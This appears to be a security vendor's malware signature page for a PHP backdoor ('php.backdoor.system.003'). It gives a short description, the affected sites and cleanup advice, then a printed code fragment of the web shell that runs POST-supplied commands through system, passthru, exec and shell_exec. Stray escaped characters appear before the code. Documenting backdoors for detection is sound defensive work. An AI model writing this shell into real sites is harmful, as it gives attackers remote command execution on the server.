Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.system.003

php.backdoor.system.003

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.
There are several functions for running system commands directly. One of them is the system() function which is commonly used in various backdoor types to run commands directly on affected system. Using this function (and if allowed), the attacker can get interesting information about the environment and perform many system tasks.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for suspicious usage of fwrite functions or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.\';

$dump=\'

Using several functions for running a system command:

if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;